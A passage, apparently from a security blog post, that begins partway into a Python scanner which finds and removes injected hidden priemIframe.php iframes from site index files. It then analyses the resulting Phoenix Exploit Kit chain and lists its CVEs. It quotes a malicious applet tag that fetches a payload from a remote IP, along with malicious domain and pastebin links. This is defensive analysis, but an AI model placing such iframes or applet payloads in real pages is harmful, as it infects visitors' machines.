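from urllib.parse import parse_qs, urlparse

# The injected tag as the post describes it: an <iframe> whose src points at
# priemIframe.php. DOTALL/lazy quantifiers cope with a tag split over lines.
IFRAME_RE = re.compile(
    r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\" >]*priemIframe\.php[^'\" >]*)"
    r"[^>]*>.*?</iframe\s*>",
    re.IGNORECASE | re.DOTALL,
)
INDEX_RE = re.compile(r"^index\.[^.]+$", re.IGNORECASE)  # same files as hacked.php

def find_injections(html):
    """One dict per injected iframe: the src plus its hashftp/hashpage
    parameters, which tie the page to the stolen account on the attacker side."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        src = m.group(1)
        qs = parse_qs(urlparse(src).query)
        hits.append({
            "src": src,
            "hashftp": qs.get("hashftp", [""])[0],
            "hashpage": qs.get("hashpage", [""])[0],
        })
    return hits

def clean_html(html):
    """Remove every injected iframe; returns (cleaned_html, number_removed)."""
    return IFRAME_RE.subn("", html)

def scan_tree(root, fix=False):
    """Walk root for index.* files; return [(path, hits)] for infected ones.
    With fix=True a .bak copy is written first, then the file is rewritten."""
    report = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not INDEX_RE.match(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                html = fh.read()
            hits = find_injections(html)
            if not hits:
                continue
            if fix:
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="utf-8") as fh:
                    fh.write(clean_html(html)[0])
            report.append((path, hits))
    return report

# Constructed sample page; the IP and hash values are placeholders, not real IoCs.
SAMPLE_PAGE = (
    "<html><body><h1>Welcome</h1>\n"
    '<iframe src="http://203.0.113.5/stats/priemIframe.php?'
    'hashftp=HASHFTP_PLACEHOLDER&hashpage=HASHPAGE_PLACEHOLDER"\n'
    ' width="1" height="1" style="visibility:hidden"></iframe>\n'
    "</body></html>\n"
)

def demo():
    """Run the scanner on a throw-away directory holding SAMPLE_PAGE and
    return (files_reported, iframe_gone, backup_kept)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "index.html")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_PAGE)
        report = scan_tree(tmp, fix=True)
        with open(path, encoding="utf-8") as fh:
            cleaned = fh.read()
        return len(report), "priemIframe" not in cleaned, os.path.exists(path + ".bak")

if __name__ == "__main__":
    print(find_injections(SAMPLE_PAGE))
    print(demo())
```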

This server, based in Ukraine, seems to be a counter and decision server. Depending on the OS and browser used, the client is then redirected to a different server. Here, a server in Austria:

http://oiewr4.at/gas/dnitezhpyokwhnhwglb2.php

The access is checked for a valid referer (you have to come from the counter server to get content). On direct access the PHP page is empty. Which content you receive strongly depends on the browser, version and OS used. (An up-to-date Firefox blocks the Austrian domain immediately due to reports.)

When the check is disabled or an older browser is used, and you have Java installed, you receive the following:

<applet mayscript='true' archive='jzdlgoazhzfvkli3.jar' code='a.class'><param name='trigger' value='isie'><param name='url' valuetype='ref' value='http:/178.162.229.52/gas/dseriwyubrjmkma.bin'></applet><body id='jpyvaq9' name='jpyvaq9'></body>

This Java code uses two different variants of the sound/MIDI exploit to infect the client (this IP address is located in India).

Now see how "well" these two "old" Java exploits are detected by up-to-date antivirus scanners: only 4 out of 47 detect the malware:

http://www.virustotal.com/file-scan/report.html?id=d72d92174…

http://www.virustotal.com/file-scan/report.html?id=bad21728c…

Here is the link to the pastebin with the malicious code:

http://pastebin.com/TRWGyCfB

Here is the code deobfuscated:

http://pastebin.com/yHHnS64s

You can now easily see the exploited vulnerabilities.

This seems to be the Phoenix Exploit Kit.

The Phoenix Exploit Kit includes exploits for the following vulnerabilities:

Flash exploits

Adobe Flash Integer Overflow in AVM2 CVE-2009-1869
Adobe Flash Integer Overflow in Flash Player CVE-2007-0071

PDF exploits

Adobe Reader CollectEmailInfo Vulnerability CVE-2007-5659
Adobe Reader Collab GetIcon Vulnerability CVE-2009-0927
Adobe Reader LibTiff Vulnerability CVE-2010-0188
Adobe Reader newPlayer Vulnerability CVE-2009-4324
Adobe Reader util.printf Vulnerability CVE-2008-2992

Internet Explorer Exploits

IE MDAC Vulnerability CVE-2006-0003
IE SnapShot Viewer ActiveX Vulnerability CVE-2008-2463
IE iepeers Vulnerability CVE-2010-0806

Java Exploits

JAVA HsbParser.getSoundBank Vulnerability CVE-2009-3867
Java Development Kit Vulnerability CVE-2008-5353

I was too slow to decrypt the script to be able to download the files, as the servers had been shut down in the meantime (within half a day).

But these exploits will definitely try to drop one or more trojans, which then search the compromised user account for saved passwords and might also hook into the browsers to get credentials directly. These credentials are submitted to a server and then used to compromise the next server. And it goes on and on...

As you can see, even a good virus scanner might let the trojan run. So don't feel safe.

  1. Don't use FileZilla
  2. Never save credentials in the browser
  3. Don't use Internet Explorer
  4. Keep your OS, browser and third-party software (Adobe Flash, Java, ...) up to date
  5. Periodically change your passwords
  6. Use security browser plugins like Adblock Plus and NoScript